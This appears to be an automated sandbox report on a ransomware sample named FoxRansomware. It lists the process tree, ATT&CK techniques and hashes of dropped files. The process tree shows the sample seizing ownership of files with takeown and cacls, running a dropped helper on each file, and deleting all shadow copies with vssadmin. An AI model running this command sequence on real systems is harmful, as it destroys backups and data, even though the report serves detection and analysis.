C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "eula.ini" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "eula.ini" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "AcroSign.prc" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "AcroSign.prc" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "forms_distributed.gif" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "forms_distributed.gif" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "reviews_sent.gif" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "reviews_sent.gif" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "stop_collection_data.gif" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "stop_collection_data.gif" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "ReadMe.htm" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "ReadMe.htm" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "MinionPro-It.otf" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "MinionPro-It.otf" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "ZX______.PFB" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "ZX______.PFB" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "brt04.hsp" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "brt04.hsp" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "engphon.env" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "engphon.env" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "CP1250.TXT" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "CP1250.TXT" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "LogTransport2.exe" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "LogTransport2.exe" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "bl.gif" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "bl.gif" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "forms_super.gif" -nobanner3⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "MahjongMCE.png" -nobanner3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "MahjongMCE.png" -nobanner4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "review_browser.gif" -nobanner3⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8CEE9AA9-CDB6-4C68-9D55-C293650D091F} S-1-5-21-3308111660-3636268597-2291490419-1000:JUBFGPHD\Admin:Interactive:[1]1⤵
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\oGCkLmPD.bat"2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "forms_super.gif" -nobanner1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "resource.xml" -nobanner1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "review_browser.gif" -nobanner1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD57dd326252c9a1ec4a07fb92ac808a9df
SHA124231eb774e788fee01d3e848984cb686b661eef
SHA25649ce694d80cd4586c47cf3de2fe6ed6526277d2fb0855049cd26ec0dd43eb2c4
SHA512461e71f1829b3ff7818f1b8110ca32de7bbc593dc5cecf70dc9cea6eb6988804e41668725e2c9ed3757b36ee97b3a98b58da86adc0c9af8c7d3952e0ee460a9c
-
Filesize
1.2MB
MD5268360527625d09e747d9f7ab1f84da5
SHA109772eb89c9743d3a6d7b2709c76e9740aa4c4b1
SHA25642f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
SHA51207fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
-
Filesize
14B
MD5c74dacdd9331a6698efffe81ff66ac08
SHA179e8ce4bb5cc2436e95fad4a74a31aee7aa63043
SHA25682ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c
SHA51224620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da
-
Filesize
134B
MD5b3ec6680d872880429e3ffba79db6ec8
SHA1e193f521ae00f0a816c16ad35e6b8717f707c370
SHA256db4b71020b0d92359709e856cb9bfda0a1f4de5e4e462893d9adc5cd6da35d17
SHA5128e847bf72fc7ce5e3365045e3c5812f7b8addee25bca38a86facb3490a7579228bf47aa14d884f14095f279d8ce487c82e7b69fee4378cf30953a5c700fb2435
-
Filesize
425B
MD5f5a3ebf92d9b2900cd8808f3337ac8c8
SHA103484a077733a001235dfd582965067145903b15
SHA2562c5108fa26eadc09f4ed3b421b85ac0d46aad3c41eb4fc86b7bafa41205af4d5
SHA512b05cc43b5cc51d6ba4d1ab61c883c923c9ad6703e2f2bc1fbb2940ea238061fa2e380dd9b378d3a6efe6d5c72fd4d85c5e565d9da3ab7afb9e8325cc3e6462fa
-
Filesize
8KB
MD5f1d4bfe7c4f1a6fab55f6b0940fd01eb
SHA1c2aac49fdd5d39bac29cfc9c1cea2003f2c7078e
SHA256b98fc82db3dca7c848febd7fec99ce951b0d5c953679f8b9dc10fffda8fb44f1
SHA5123b8582593a544ced6305abb8c7f2768f1a3928fa04b47fd6a4da2a20c9e87fb6bfa731b5333f61d1f92a0e3cc532b58be203076949a379f9761bc43cfbb9fc30
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
64KB
MD539384617afb7b1a4cd7b11d998292e13
SHA187689603aebba6b353bbca3d5a038c0e8e59fd4c
SHA256b41666aedfb669305f37349dfae96eea3f34ae7ba89629a268c2a403302bdbaa
SHA51252be3914e3330330a83463cc2925ffa5d0bdb1a4358f48c1298cc0c5f631a214a8d9328232f95c496642da2300f713a5f0288d6ea6af52fb0e173c1431e442e7
-
Filesize
226B
MD51ea00804ef70f0801cbaa06c41199a36
SHA1cf5ff496864f4a62cd7a2cda0cfdd3f50aa27046
SHA256249430ced89f1e72331e7cffacf545ec8098c8de495373a5216e213620a19307
SHA512f2e401709bb3db26de15758fa9fcd47c078176829d3fdead150c920cfb8e3ef092e808ce6299043eb5c02a5edaaf7dc69908fb82a94fdc9b3092cb79632da4f1
-
Filesize
260B
MD5670c24fc8d7e514e971a184129cc4796
SHA1e9009664ac70fc2c49fbbc903f743c405f0b96d6
SHA2560f0d35ba87b390da1a080ed8a60bd1ddb7b811169a9ce2f9cc7604153233c2ef
SHA512e75bfb436b43a005ea4751cea0b7f60de1e9cc747dcd5e4d993184e10d3ac4b0d391574bc20da7401d4f1b1122073db163dc19577222f8fe9f9b464eaefe974e
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
1.2MB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB